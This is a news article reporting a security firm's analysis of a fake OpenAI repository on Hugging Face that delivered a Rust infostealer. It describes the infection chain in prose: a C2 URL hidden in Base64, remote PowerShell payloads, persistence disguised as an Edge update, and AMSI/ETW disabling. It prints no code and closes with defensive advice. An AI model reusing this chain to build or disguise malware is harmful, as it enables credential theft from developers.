Hugging Face Malware Posed as Fake OpenAI Release

The rapid rise of artificial intelligence has transformed how developers, researchers, and enterprises build software. Platforms like Hugging Face have become central hubs for sharing AI models, datasets, and development tools. However, a recent cybersecurity incident has revealed a dangerous new trend: attackers are now exploiting public AI repositories to distribute malware.

According to findings from AI security company HiddenLayer, a malicious repository hosted on Hugging Face successfully impersonated an OpenAI project and distributed credential-stealing malware to Windows users. The fake repository reportedly recorded approximately 244,000 downloads before it was removed, though researchers believe the numbers may have been artificially inflated to make the project appear trustworthy and widely adopted.

This incident highlights a growing concern surrounding AI software supply chains and the security risks associated with downloading unverified machine learning models and scripts.

Fake OpenAI Privacy Filter Repository Discovered

The malicious repository operated under the name “Open-OSS/privacy-filter,” closely mimicking a legitimate OpenAI Privacy Filter release. Researchers noted that the attackers copied the original project’s documentation almost word-for-word, making it appear authentic to unsuspecting developers and data scientists.

The fake repository even reached Hugging Face’s trending section, accumulating 667 likes in less than 18 hours. Security analysts believe these engagement metrics may also have been manipulated by attackers to increase credibility and visibility.

What made the attack particularly dangerous was the inclusion of a malicious loader.py file. While it appeared to function like a normal AI model setup script, it secretly downloaded and executed infostealer malware on Windows systems.

The README instructions were intentionally crafted to guide users into running infected files. Unlike the legitimate project, the malicious version instructed users to execute start.bat on Windows systems or run python loader.py on Linux and macOS devices. These commands triggered the malware infection chain.

How the Malware Infection Worked

HiddenLayer researchers explained that the loader.py script initially resembled a standard AI model loader. However, beneath the surface, it contained hidden malicious logic designed to compromise user systems.

The attack chain reportedly followed several stages:

1. SSL Verification Disabled

The malicious script first disabled SSL verification, reducing security protections and allowing unsafe network communication.

2. Base64-Encoded URL Decoding

The script decoded a hidden Base64-encoded URL connected to jsonkeeper.com. This external service acted as a command-and-control mechanism for attackers.

3. Remote Payload Retrieval

After establishing communication, the malware downloaded additional instructions remotely. This method allowed attackers to update or rotate malicious payloads without modifying the repository itself, making detection more difficult.

4. PowerShell Execution on Windows

The retrieved commands were passed directly to PowerShell on Windows systems. The PowerShell process downloaded another batch file from an attacker-controlled domain.

5. Persistence Mechanism

The malware then created a scheduled task disguised as a legitimate Microsoft Edge update process. This persistence technique ensured the malware continued operating even after system restarts.

Rust-Based Infostealer Malware Targeted Sensitive Data

The final payload deployed in the attack was a Rust-based infostealer. According to HiddenLayer, the malware targeted multiple sensitive data sources commonly found on developer machines.

The malware attempted to steal:

  • Chromium-based browser data
  • Firefox browser information
  • Discord local storage
  • Cryptocurrency wallet files
  • FileZilla configuration data
  • Host system information

Researchers also found that the malware tried to disable key Windows security protections, including:

  • Windows Antimalware Scan Interface (AMSI)
  • Event Tracing for Windows (ETW)

Disabling these protections can make malware harder to detect and analyze using traditional security tools.

AI Repositories Are Becoming Software Supply Chain Risks

The attack demonstrates how public AI repositories are increasingly becoming part of the modern software supply chain attack surface.

Developers and organizations frequently clone machine learning models directly into production or corporate environments. These environments often contain:

  • Cloud credentials
  • Internal APIs
  • Source code repositories
  • Sensitive datasets
  • Enterprise authentication tokens

Unlike traditional software packages, AI repositories commonly include executable scripts, notebooks, dependency installers, and setup instructions. While the AI models themselves may be harmless, these surrounding files can easily be weaponized.

Security experts have repeatedly warned that malicious code can be embedded inside AI-related resources. Earlier incidents involved Pickle-serialized model files capable of bypassing platform scanners and executing hidden code during deserialization.

The Hugging Face malware case shows attackers are now expanding beyond model files and targeting developer workflows directly.

HiddenLayer Identified Additional Malicious Repositories

The investigation did not stop with a single repository.

HiddenLayer researchers reportedly uncovered six additional Hugging Face repositories containing nearly identical loader logic and shared attacker infrastructure. This suggests the campaign may have been larger and more coordinated than initially believed.

The incident also follows previous reports involving:

  • Poisoned AI SDKs
  • Fake OpenClaw installers
  • Malicious dependency packages targeting AI developers

Cybercriminals are increasingly viewing AI ecosystems as valuable entry points into otherwise secure enterprise environments.

Traditional Security Tools May Not Be Enough

One of the most concerning aspects of this attack is how easily it bypassed traditional software security approaches.

Sakshi Grover, senior research manager for cybersecurity services at IDC, explained that conventional Software Composition Analysis (SCA) tools were primarily designed to inspect dependency manifests, container images, and software libraries.

However, these tools are often ineffective against malicious loader scripts hidden inside AI repositories.

IDC’s November 2025 FutureScape report predicted that by 2027, nearly 60% of agentic AI systems would require a bill of materials (BOM). Such AI BOM frameworks would help organizations track:

  • AI artifacts in use
  • Approved versions
  • Repository sources
  • Embedded executable components
  • Dependency relationships

This visibility could significantly improve AI supply chain security and reduce the risk of compromised repositories entering enterprise systems.

Hugging Face Removed the Malicious Repository

Following the disclosure, Hugging Face confirmed that the malicious repository had been removed from the platform.

Users who downloaded or executed files from the repository have been advised to treat affected systems as fully compromised.

HiddenLayer specifically warned users who ran:

  • start.bat
  • python loader.py
  • Any executable from the repository

to immediately isolate and re-image impacted systems.

Researchers also warned that browser sessions should be considered compromised, even when passwords are not stored locally. Attackers can use stolen session cookies to bypass multi-factor authentication (MFA) protections in some cases.

How Developers Can Protect Themselves

As AI development ecosystems continue growing, developers and enterprises must adopt stronger security practices when working with public AI repositories.

Key security recommendations include:

Verify Repository Authenticity

Always confirm repository ownership, official links, and publisher reputation before downloading files.

Avoid Running Unknown Setup Scripts

Never execute batch files, PowerShell commands, or Python scripts from unverified sources without inspection.

Use Sandboxed Environments

Run AI models inside isolated virtual machines or containers whenever possible.

Monitor Outbound Connections

Unexpected external connections may indicate malicious behavior.

Scan Files Before Execution

Use endpoint detection and malware scanning tools to inspect repositories and dependencies.

Implement AI Bill of Materials (AI-BOM)

Organizations should maintain detailed inventories of all AI models, dependencies, scripts, and artifacts used internally.

Conclusion

The fake OpenAI Privacy Filter incident on Hugging Face serves as a major warning for the AI industry. Attackers are actively targeting AI development workflows, exploiting the trust developers place in public repositories and trending projects.

As AI adoption accelerates across enterprises, securing machine learning supply chains will become just as important as protecting traditional software ecosystems.

The incident also reinforces a critical lesson for developers: AI repositories are not just collections of models. They often contain executable code capable of introducing serious cybersecurity risks into corporate environments.

With malicious AI repositories becoming more sophisticated, organizations must strengthen verification, monitoring, and supply chain security practices before these attacks become even more widespread.

Read Also:


Discover more from AiTechtonic - Informative & Entertaining Text Media

Subscribe to get the latest posts sent to your email.